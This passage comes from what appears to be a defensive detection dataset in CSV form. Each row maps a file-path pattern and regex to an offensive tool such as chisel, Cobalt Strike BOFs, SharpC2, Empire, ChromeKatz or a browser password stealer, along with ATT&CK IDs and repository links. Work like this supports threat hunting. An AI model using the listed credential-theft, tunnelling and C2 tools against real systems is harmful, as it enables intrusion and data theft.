TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel/client/*",".{0,1000}\/chisel\/client\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel/server/*",".{0,1000}\/chisel\/server\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel@latest*",".{0,1000}\/chisel\@latest.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel_x32*",".{0,1000}\/chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/chisel_x64*",".{0,1000}\/chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/chisel-darwin_amd64*",".{0,1000}\/chisel\-darwin_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel-freebsd*",".{0,1000}\/chisel\-freebsd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel-linux_*",".{0,1000}\/chisel\-linux_.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel-master*",".{0,1000}\/chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel-windows_amd6*",".{0,1000}\/chisel\-windows_amd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chrisk44/*",".{0,1000}\/chrisk44\/.{0,1000}","offensive_tool_keyword","Github Username","Github username known for network exploitation tools","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","1","N/A","N/A","10","2320","419","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" "*/chrome_decrypt.py*",".{0,1000}\/chrome_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/ChromeDump/*",".{0,1000}\/ChromeDump\/.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*/ChromeKatz.git*",".{0,1000}\/ChromeKatz\.git.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*/chromepasswordlist.csv*",".{0,1000}\/chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/chromepasswords.py*",".{0,1000}\/chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/chromium_based_browsers.py*",".{0,1000}\/chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*/chromium_history.py*",".{0,1000}\/chromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/chromium_logins.py*",".{0,1000}\/chromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/cics-enum.nse*",".{0,1000}\/cics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cics-info.nse*",".{0,1000}\/cics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cics-user-brute.nse*",".{0,1000}\/cics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cics-user-enum.nse*",".{0,1000}\/cics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CIMplant.exe*",".{0,1000}\/CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*/CIMplant.git*",".{0,1000}\/CIMplant\.git.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*/CIMplant/Commander.cs*",".{0,1000}\/CIMplant\/Commander\.cs.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*/citrix-brute-xml.nse*",".{0,1000}\/citrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-apps.nse*",".{0,1000}\/citrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-apps-xml.nse*",".{0,1000}\/citrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-servers.nse*",".{0,1000}\/citrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-servers-xml.nse*",".{0,1000}\/citrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/clamav-exec.nse*",".{0,1000}\/clamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cleantracks.ps1",".{0,1000}\/cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/clickme.docx*",".{0,1000}\/clickme\.docx.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","106","29","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*/client/beef.js*",".{0,1000}\/client\/beef\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/client/bof/*.asm*",".{0,1000}\/client\/bof\/.{0,1000}\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*/Client/Commands/Enumeration.yaml*",".{0,1000}\/Client\/Commands\/Enumeration\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Execution.yaml*",".{0,1000}\/Client\/Commands\/Execution\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Injection.yaml*",".{0,1000}\/Client\/Commands\/Injection\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Lateral.yaml*",".{0,1000}\/Client\/Commands\/Lateral\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Tokens.yaml*",".{0,1000}\/Client\/Commands\/Tokens\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/client/generated-stagers/*",".{0,1000}\/client\/generated\-stagers\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/Client/Pages/Drones.razor*",".{0,1000}\/Client\/Pages\/Drones\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Payloads.razor*",".{0,1000}\/Client\/Pages\/Payloads\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Pivots.razor*",".{0,1000}\/Client\/Pages\/Pivots\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/clipboardinject.*",".{0,1000}\/clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/clipboardinject/*",".{0,1000}\/clipboardinject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/ClipboardMITM.py*",".{0,1000}\/ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/clipmon/clipmon.sln*",".{0,1000}\/clipmon\/clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/clipmon/dll/*",".{0,1000}\/clipmon\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/CloakNDaggerC2*",".{0,1000}\/CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*/clock-skew.nse*",".{0,1000}\/clock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cloud_enum.git*",".{0,1000}\/cloud_enum\.git.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*/cloud_enum.py*",".{0,1000}\/cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*/cloud_enum.txt*",".{0,1000}\/cloud_enum\.txt.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*/cloudbrute.yaml*",".{0,1000}\/cloudbrute\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/cloudsploit.git*",".{0,1000}\/cloudsploit\.git.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are 